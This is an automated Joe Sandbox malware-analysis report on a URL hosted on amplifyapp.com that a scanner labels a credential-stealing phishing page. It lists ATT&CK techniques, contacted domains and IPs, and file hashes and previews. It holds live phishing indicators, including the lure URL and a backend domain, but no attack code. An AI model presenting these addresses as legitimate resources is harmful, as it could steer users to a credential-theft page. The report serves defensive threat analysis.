Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/100%SlashNextCredential Stealing type: Phishing & Social usering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/app.94aec170.js0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-regular-400.b041b1fa4fe241b23445.3580b4a9.woff20%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.css0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-solid-900.b6879d41b0852f01ed5b.fd0b155c.woff20%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/chunk-vendors.401e5810.js0%Avira URL Cloudsafe
https://disenx.online/api/fetch/ban0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/favicon.ico0%Avira URL Cloudsafe
https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff0%Avira URL Cloudsafe
https://flareapp.io/docs/ignition-for-laravel/security0%Avira URL Cloudsafe
https://fonts.cdnfonts.com/css/montserrat?styles=17402);0%Avira URL Cloudsafe
https://fonts.cdnfonts.com/css/montserrat?styles=174020%Avira URL Cloudsafe
https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff)0%Avira URL Cloudsafe
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
fonts.cdnfonts.com
172.64.133.22
truefalse
    unknown
    ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com
    52.48.38.99
    truefalse
      high
      socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com
      34.240.119.52
      truefalse
        high
        www.google.com
        172.253.115.104
        truefalse
          high
          api.ipify.org
          104.26.13.205
          truefalse
            high
            isuecenter.dig4pnjky2v0q.amplifyapp.com
            13.249.39.10
            truefalse
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.211.108
              truefalse
                unknown
                disenx.online
                198.54.126.115
                truefalse
                  unknown
                  sockjs-eu.pusher.com
                  unknown
                  unknownfalse
                    high
                    ws-eu.pusher.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-regular-400.b041b1fa4fe241b23445.3580b4a9.woff2false
                      • Avira URL Cloud: safe
                      unknown
                      https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_send?t=1711393644596&n=2false
                        high
                        https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/app.94aec170.jsfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/true
                          unknown
                          https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/chunk-vendors.401e5810.jsfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://isuecenter.dig4pnjky2v0q.amplifyapp.com/img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.wofffalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ipify.org/?format=jsonfalse
                            high
                            https://disenx.online/api/fetch/banfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://isuecenter.dig4pnjky2v0q.amplifyapp.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ws-eu.pusher.com/app/0d3b34df0b6b9220c260?protocol=7&client=js&version=8.0.2&flash=falsefalse
                              high
                              https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.cssfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-solid-900.b6879d41b0852f01ed5b.fd0b155c.woff2false
                              • Avira URL Cloud: safe
                              unknown
                              https://fonts.cdnfonts.com/css/montserrat?styles=17402false
                              • Avira URL Cloud: safe
                              unknown
                              https://isuecenter.dig4pnjky2v0q.amplifyapp.com/false
                              • Avira URL Cloud: safe
                              unknown
                              https://sockjs-eu.pusher.com/pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1711393641468&n=1false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://fontawesome.comchromecache_55.2.drfalse
                                  high
                                  https://tailwindcss.comchromecache_58.2.drfalse
                                    high
                                    https://pusher.com/chromecache_63.2.drfalse
                                      high
                                      https://flareapp.io/docs/ignition-for-laravel/securitychromecache_58.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/spatie/ignition/issues/new?title=$chromecache_58.2.drfalse
                                        high
                                        https://fonts.cdnfonts.com/css/montserrat?styles=17402);chromecache_55.2.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff)chromecache_57.2.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://fontawesome.com/license/freechromecache_55.2.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          172.64.133.22
                                          fonts.cdnfonts.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          13.249.39.10
                                          isuecenter.dig4pnjky2v0q.amplifyapp.comUnited States
                                          16509AMAZON-02USfalse
                                          52.48.38.99
                                          ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comUnited States
                                          16509AMAZON-02USfalse
                                          99.81.234.0
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          172.253.115.104
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          13.249.39.80
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          34.240.119.52
                                          socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comUnited States
                                          16509AMAZON-02USfalse
                                          104.26.13.205
                                          api.ipify.orgUnited States
                                          13335CLOUDFLARENETUSfalse
                                          198.54.126.115
                                          disenx.onlineUnited States
                                          22612NAMECHEAP-NETUSfalse
                                          172.67.74.152
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          IP
                                          192.168.2.6
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1415410
                                          Start date and time:2024-03-25 20:06:25 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 3m 2s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:browseurl.jbs
                                          Sample URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal56.phis.win@16/28@22/12
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 172.253.115.94, 142.251.16.102, 142.251.16.101, 142.251.16.138, 142.251.16.100, 142.251.16.139, 142.251.16.113, 142.251.16.84, 34.104.35.123, 142.251.163.95, 142.251.179.95, 142.250.31.95, 172.253.63.95, 172.253.115.95, 142.251.167.95, 142.251.16.95, 172.253.62.95, 172.253.122.95, 142.251.111.95, 69.164.0.128, 192.229.211.108, 13.85.23.206, 20.242.39.171, 142.251.111.94, 69.164.0.0
                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, clients.l.google.com
                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/
                                          No simulations
                                          No context
                                          No context
                                          No context
                                          No context
                                          No context
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 2560 x 516, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):73614
                                          Entropy (8bit):7.883312602090907
                                          Encrypted:false
                                          SSDEEP:1536:kRl7IFbZxFdo72HKfWWxpUkNreEyvLIoZ37Mv7jKDNWVGMzTzvcGgDxrY5NyxkLG:kb7IlFdoN7xphNreEE8m37K72ePzXgD1
                                          MD5:7FE0C84197452B900619714DD637E85C
                                          SHA1:272F544AB2ADC0CE91EBB40E06AF89A188E92FBB
                                          SHA-256:9F08F9AA36EA4FF172DF15351DCC20BBB604C75EC2AE868203EAE517005C82C6
                                          SHA-512:59CC12FADEB3B9B909B6865AA41E9FBCCC29A2EFC43224630E45A80B533E760C2C327EA7E2A6B01BA087498A4CF936AABFB653196F831E1B6B417DD4610A4165
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png
                                          Preview:.PNG........IHDR..............*w.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...wx[.....}$....eg.F"'...hI.....:(3..B..Z Q...RV..@'..(].8P..(#q.]2.8.t........t$}?..@!..G::.n=..@n.=.$..]..2k.k..md6P.....T#S.\.\...[.I...,.....m...I..^........Z.@.(.s...Y.Ca..Z8.y....K{ )!..,Y.,.An..m..w....m%...d.../.J.z._..)I..:.7J...Q.^..... ......2.jXm.N.n.............\....1.5x...}.6A.].|.dU...vKz^.jI.HzJ.O.bO...m..9...&...|.<.U.;.5Z.(I5E...wH.Rn+....=!....O.T...................I:...uV}D.w.|.\.2...HA.~....2..d.(..M....u.^.....|.6g.%.D..%.(..%x....B.6..&Y...:.. ..............@T 7...}..#${...*..x...zZ....*.....7Gur.......}........be....i.\..t...CJ..I..........@$0.............&K....~$.~.%-.....'u.....@....l..2.&.}...~..Y.Cr.'.}...Og.&n(...........b`...i.SM..+....(W.]0'..c2........I..]...2..me....p...4.(o.S.?..;..N.T-..............P....|..z.._P..e.m.o.%y.{]._d......#.s...D..u.\f....*.m}.Cn?..O.c.^.`.$...............(m.:.R.=E.{J
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:downloaded
                                          Size (bytes):22
                                          Entropy (8bit):3.697845823084411
                                          Encrypted:false
                                          SSDEEP:3:YMKUcLRJyYn:YMKUcmYn
                                          MD5:17E1EAA011E9747E475831AA6C898788
                                          SHA1:DACD8E0EF5FC5AD4871C5183DBBE4C0D0A472297
                                          SHA-256:84C83643678BA77F5C0F248ABEB64E7B29C811177C6CA2C9477AC5AA9D1FE9A0
                                          SHA-512:606CCB43E24FB4AEBABEFBEB7D814C63748863E0EB4A0F2BDB8D1BC7D51FA775A9227BFE21FAC87DEF375030C92A79976790A9B58B320B00B55C8E528A704223
                                          Malicious:false
                                          Reputation:low
                                          URL:https://api.ipify.org/?format=json
                                          Preview:{"ip":"102.165.48.43"}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (64677), with CRLF, LF line terminators
                                          Category:downloaded
                                          Size (bytes):517650
                                          Entropy (8bit):5.020286953511538
                                          Encrypted:false
                                          SSDEEP:3072:2VTu2zaCKHi7GXxHLLG+w4e3dBZH52OR7eyJ2Swj4pQfPB:+69nqGXd6UiDH5DCT1EQfJ
                                          MD5:29DDCB6F79B8CC5BFE4DC44283336026
                                          SHA1:C629567F1E338E94FBC6E6B625F46C436E45B6C6
                                          SHA-256:40C58E722EB7415E9CF526F8ED631A7AC61BF0ED9458F2C78024FFBF5A979407
                                          SHA-512:F3EA069304DB00FD9BAD7338847408ECA9A6E176443C98954ED850407065DD2529E7A33B9D01007DD4D56A5D50DCA276358D7D9B252D50A5908AB48BDC362FB3
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.css
                                          Preview:@import url(https://fonts.cdnfonts.com/css/montserrat?styles=17402);@import url(https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100;0&display=swap);html{-webkit-text-size-adjust:100%;font-feature-settings:normal;font-family:ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-variation-settings:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4}body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:Montserrat,sans-serif!important;margin:0}..../*!.. * Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com.. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License).. * Copyright 2023 Fonticons, Inc... */.fa[data-v-e7e7d034]{font-family:Font Awesome\ 6 Free;font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:900;font-weight
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                          Category:downloaded
                                          Size (bytes):5430
                                          Entropy (8bit):5.050260458306991
                                          Encrypted:false
                                          SSDEEP:96:fkb03+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:cucjRRRRRRRRRRi90
                                          MD5:DE76B0C210C815EF282D5B59DE8A0567
                                          SHA1:023038E2DFD649047BE4FBBA79C78DD80BC4CD90
                                          SHA-256:C636A92A12EB33629E6DCADC67E49651AC54E8F3B18A03C805668505F05C885A
                                          SHA-512:648F9BBAF647836770358E39200CC744CA9CC417FAEF2A9623FEACEBEF74781289F858E0B7B8D5A12E53446D1E8E34EC2AA26900AF3BD59D9B4BCCF45B3B8597
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/favicon.ico
                                          Preview:............ .h...&... .... .........(....... ..... ..........................................e.+.f...f...........e...f...k.+..........................+..i...k...i...i...........i...i...j...i....+...............+..o...n...n...n...n...........n...n...n...n...o....+..........s...s...s...s...s...s...........s...s...s...s...s...s.......}.+.x...w...x...w...x...x...........w...w...x...w...x...y...}.+.}...}...}...|...}...|...|...........}...}...|...}...|...|...}................................................................................................8....................................................................................................................................................................z............................+.........................................................+..............................#..............}.......................+...................................................+...............+...............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):171
                                          Entropy (8bit):4.7483338131373145
                                          Encrypted:false
                                          SSDEEP:3:0SYfR+EyMEPEIOK2DfRV0WX7rqXlXXjD+KWzdNoEHXXNAC1bSKDDMUYARNZ:0NR+hZwNV0Q7rsl0fxHSWSuhNZ
                                          MD5:5B98BF86C72CFB2DB81D4950AC4DE032
                                          SHA1:6A9A03A3A2CE16027F96B67D09B3E63EB94CF682
                                          SHA-256:AB49CD1175438A92235CEA10761E382DA5C34A0F167BEEFBCD30283DF19BDBF0
                                          SHA-512:FA32EA17D829A54EC594722994B63C897CF5053F2A12A309E7181456877EC47EF901B4DB6028F45AECAFE12A7880D86AA6B9FDCB074A966922D47A143AA2981D
                                          Malicious:false
                                          Reputation:low
                                          URL:https://fonts.cdnfonts.com/css/montserrat?styles=17402
                                          Preview:@font-face{font-family:montserrat;font-style:normal;font-weight:400;src:local('Montserrat'),url(https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff) format('woff')}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (40167)
                                          Category:dropped
                                          Size (bytes):806158
                                          Entropy (8bit):5.545289915850456
                                          Encrypted:false
                                          SSDEEP:6144:ayZiLwQ2V2Q2V3eR6nvcgTNfYt/LhlIUo4WCuGvFbL9qBFJT75ZcUhQlPmbNi6Ss:aAw5vTcUhQaGFJS
                                          MD5:3664723B1D1BCE4617EE95FF809B2B9D
                                          SHA1:8F78F75E4E541C97D1504AF08BABD1CE5901CB5E
                                          SHA-256:7BD32D9B1EF4DAD0B3D40644BDFC1BBB287E37B6E414E5A754F5E9E87001DE20
                                          SHA-512:1654EF3DCC91BF5876945C9BBB8E4E676D796ED0A629BB57C682B05867C50BDF9AFCE6219ADBE5C28316275404F116E4C5790C156E903E06F8B55DCB184ED995
                                          Malicious:false
                                          Reputation:low
                                          Preview:<!DOCTYPE html>.<html lang="en" class="auto">. .Symfony\Component\HttpKernel\Exception\MethodNotAllowedHttpException: The GET method is not supported for this route. Supported methods: POST. in file /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php on line 118..#0 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php(104): Illuminate\Routing\AbstractRouteCollection-&gt;methodNotAllowed().#1 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php(41): Illuminate\Routing\AbstractRouteCollection-&gt;getRouteForMethods().#2 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php(162): Illuminate\Routing\AbstractRouteCollection-&gt;handleMatchedRoute().#3 /home/disercoq/public_html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(680): Illuminate\Routing\RouteCollection-&gt;match().#4 /home/di
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                          Category:dropped
                                          Size (bytes):5430
                                          Entropy (8bit):5.050260458306991
                                          Encrypted:false
                                          SSDEEP:96:fkb03+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:cucjRRRRRRRRRRi90
                                          MD5:DE76B0C210C815EF282D5B59DE8A0567
                                          SHA1:023038E2DFD649047BE4FBBA79C78DD80BC4CD90
                                          SHA-256:C636A92A12EB33629E6DCADC67E49651AC54E8F3B18A03C805668505F05C885A
                                          SHA-512:648F9BBAF647836770358E39200CC744CA9CC417FAEF2A9623FEACEBEF74781289F858E0B7B8D5A12E53446D1E8E34EC2AA26900AF3BD59D9B4BCCF45B3B8597
                                          Malicious:false
                                          Reputation:low
                                          Preview:............ .h...&... .... .........(....... ..... ..........................................e.+.f...f...........e...f...k.+..........................+..i...k...i...i...........i...i...j...i....+...............+..o...n...n...n...n...........n...n...n...n...o....+..........s...s...s...s...s...s...........s...s...s...s...s...s.......}.+.x...w...x...w...x...x...........w...w...x...w...x...y...}.+.}...}...}...|...}...|...|...........}...}...|...}...|...|...}................................................................................................8....................................................................................................................................................................z............................+.........................................................+..............................#..............}.......................+...................................................+...............+...............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with very long lines (590), with no line terminators
                                          Category:downloaded
                                          Size (bytes):590
                                          Entropy (8bit):4.951176418627047
                                          Encrypted:false
                                          SSDEEP:12:qT41krC2N56M8IivhSdNVWVMNVeOuTG7fQ/2zMcZq8sBOa:041kOe6tnvhAVWIVhuC74sA87a
                                          MD5:C696CA191CA68BDEDF863D677141B501
                                          SHA1:B972B3CBA68F168992BB1D1A1A74C7CCED624C98
                                          SHA-256:79D18B5BCD26C8146182295D5F35C3BC7C54395F4F699D31655550E59BA01D7D
                                          SHA-512:586647AF528A84B98D435BA6C2B0C8C666F3F459AE455E1CB04AA098DC2EBAA97E9FF922B656D90B4BEDBB12F23C3F347D367FA8F674AE72E0676368B1DE8D19
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Preview:<!doctype html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>fb</title><script defer="defer" src="/js/chunk-vendors.401e5810.js"></script><script defer="defer" src="/js/app.94aec170.js"></script><link href="/css/app.1aceff02.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but fb doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div></body></html>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 24488, version 772.1280
                                          Category:downloaded
                                          Size (bytes):24488
                                          Entropy (8bit):7.987907109929418
                                          Encrypted:false
                                          SSDEEP:384:Ok8mTTNu15tM1xuB9dYY7YRHmOdjzUJsAr4p8Oq7kpPyXBpqrhDRBybCpMuT33SI:OGg15tM1xuBYY7YRHmcjzUJJr4p8Oq7a
                                          MD5:747442FA76F1D9A31F9A54A2E8A4B448
                                          SHA1:07FC0AE14BB3187839082AED3BCA11DFB1E04524
                                          SHA-256:9169D8BE7A8177E5A92A4D04B6DE7F6504B938573BF4DA5889871C4F376D3849
                                          SHA-512:274DBE5BC31C560D2CC2D15AFE5485687B2F7DD0EE24FFED99627310EA36A6A3CC1C91E22368F909D056F4FAAB051838D469E0BFE8A30169B735ACA5EB0F402F
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-regular-400.b041b1fa4fe241b23445.3580b4a9.woff2
                                          Preview:wOF2......_..........._].........................8.$. .`..P.....h.,.... .svU!=o.=DT.z8#9i...j..w..*~...?..3p\.u.<<..~.N.... e..........!.i..G.........wFA.?...S.C...H48Y..`:.=........{ ....@.. .J.D...J.Y..=.).Is..;.>c.Tg.(...j..x..:.uo..;..7e...'\.^%.JE.*Vi1:.i...N...G?..|..7.g..Yg.....8..7+'.g.sb..C.Y.f..I.I ..-...PE......l..d..E....KM.).w..O{7,'....`c........%0.....fw){F[G..M-.t...H..i.w...M).......H...!...M5{...@.*.1.)t!..{.o...-v.....T.<]. ..I.?..]..@R.@..)^J.C...L.yTq18'....C......S...to..\.*mc0...,P.[E.T...0B...8.._.r.0H..i...te..B.D..M.....oi7.......I.._..5.r...h..6eCR..2...a.w.'.s..V...('n.~.n..(....h...R..4.t......+.+...~...b.j MH...TB."L*j.J..RZS.T,.aS|][*~...M...K...]...r].Uy.2......,........r<.^._.G].I.2v...W_.H..~....H.S.n..v^..2.i....=.....|..'...kR(.*....U.k........4..k.r[Y..j./X.S{*K.,....57..._Un...C..b.V2.....u..5Zy.:..L._.6n...D3.Q.. ....v;..n{..~..t.aG.u.q'.t.ig..l.x...k.........T.q&...&d....lS.9.....>.7.[.....|V>'_
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):68
                                          Entropy (8bit):4.281155173260481
                                          Encrypted:false
                                          SSDEEP:3:H+uZgk2IDthGDthGDthGRY:euZgkrGGG+
                                          MD5:71148B3C5CC418971ABC7B26DAE507D2
                                          SHA1:2F11287F76836B31BE799B8F48099F18E6C8CD77
                                          SHA-256:9DEF5EC990846E8B382AB49B4B77FC920926E5AE329B547485ED040A9FA8AB7E
                                          SHA-512:2542D7D6F56E8B0E5CA19028CA3C3E62291E3FF550DE336E15A867F6DA3B7D811D9BA9CA0DBD73107FA8B811F6EE835272806B9DFFA1A1894E7B1073A2885D06
                                          Malicious:false
                                          Reputation:low
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkd3kIQ-RbTAxIFDZFhlU4SJQnHGwd1JJJMDBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4=?alt=proto
                                          Preview:CgkKBw2RYZVOGgAKJAoHDZFhlU4aAAoHDZFhlU4aAAoHDZFhlU4aAAoHDZFhlU4aAA==
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                          Category:downloaded
                                          Size (bytes):244046
                                          Entropy (8bit):5.347101591698092
                                          Encrypted:false
                                          SSDEEP:6144:nu/VbasYvB9dZOPdSMOoBFGGXfzxwy10A83:0asYJ9PHGXrT0z
                                          MD5:FA7113CD4AB13FD9F1D38264A5AE965D
                                          SHA1:3802BE113828AC67735307B6DD78EA4EBD03D4B3
                                          SHA-256:0DD609E0B3285F291364591E091F11DD27E1363701FF402CB1B63E0E47AAA3E5
                                          SHA-512:70AEA07761D44567A62D03DB987EE960B4C67ECB8F824C7FA1EE284DE66CF6AB2CDB9A374CD70235C7D64194DB447275FC90236995862C002A6382BEC82641B5
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/chunk-vendors.401e5810.js
                                          Preview:(self["webpackChunkfb"]=self["webpackChunkfb"]||[]).push([[998],{9662:function(t,e,n){var r=n(614),o=n(6330),i=TypeError;t.exports=function(t){if(r(t))return t;throw i(o(t)+" is not a function")}},6077:function(t,e,n){var r=n(614),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||r(t))return t;throw i("Can't set "+o(t)+" as a prototype")}},5787:function(t,e,n){var r=n(7976),o=TypeError;t.exports=function(t,e){if(r(e,t))return t;throw o("Incorrect invocation")}},9670:function(t,e,n){var r=n(111),o=String,i=TypeError;t.exports=function(t){if(r(t))return t;throw i(o(t)+" is not an object")}},3013:function(t){t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},260:function(t,e,n){"use strict";var r,o,i,s=n(3013),a=n(9781),c=n(7854),u=n(614),l=n(111),f=n(2597),p=n(648),h=n(6330),d=n(8880),g=n(8052),v=n(7045),m=n(7976),y=n(9518),b=n(7674),w=n(5112),_=n(9711),C=n(9909),S=C.enforce,O=C.get,x=c.Int8Array,E=x&&x.prototype,k=c.Uint8ClampedArray,T=k&&k.prototyp
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 2560 x 516, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):73614
                                          Entropy (8bit):7.883312602090907
                                          Encrypted:false
                                          SSDEEP:1536:kRl7IFbZxFdo72HKfWWxpUkNreEyvLIoZ37Mv7jKDNWVGMzTzvcGgDxrY5NyxkLG:kb7IlFdoN7xphNreEE8m37K72ePzXgD1
                                          MD5:7FE0C84197452B900619714DD637E85C
                                          SHA1:272F544AB2ADC0CE91EBB40E06AF89A188E92FBB
                                          SHA-256:9F08F9AA36EA4FF172DF15351DCC20BBB604C75EC2AE868203EAE517005C82C6
                                          SHA-512:59CC12FADEB3B9B909B6865AA41E9FBCCC29A2EFC43224630E45A80B533E760C2C327EA7E2A6B01BA087498A4CF936AABFB653196F831E1B6B417DD4610A4165
                                          Malicious:false
                                          Reputation:low
